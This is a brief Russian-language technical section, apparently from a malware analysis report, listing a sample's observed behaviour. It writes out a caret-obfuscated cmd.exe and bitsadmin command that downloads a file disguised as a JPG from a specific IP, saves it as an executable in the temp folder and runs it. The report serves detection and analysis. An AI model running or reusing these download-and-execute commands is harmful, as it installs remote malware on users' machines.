Техническая информация
- '<SYSTEM32>\cmd.exe' /c b^i^t^s^a^d^min^ /t^ra^n^s^f^e^r^ ^/^d^o^w^n^l^o^a^d "http://89.248.169.136/bigmac.jpg" "%tmp%/DSajIODA.exe" && %tmp%/DSajIODA.exe
- '89.##8.169.136':80
- '<SYSTEM32>\cmd.exe' /c b^i^t^s^a^d^min^ /t^ra^n^s^f^e^r^ ^/^d^o^w^n^l^o^a^d "http://89.248.169.136/bigmac.jpg" "%tmp%/DSajIODA.exe" && %tmp%/DSajIODA.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://89.248.169.136/bigmac.jpg" "%LOCALAPPDATA%\Temp/DSajIODA.exe"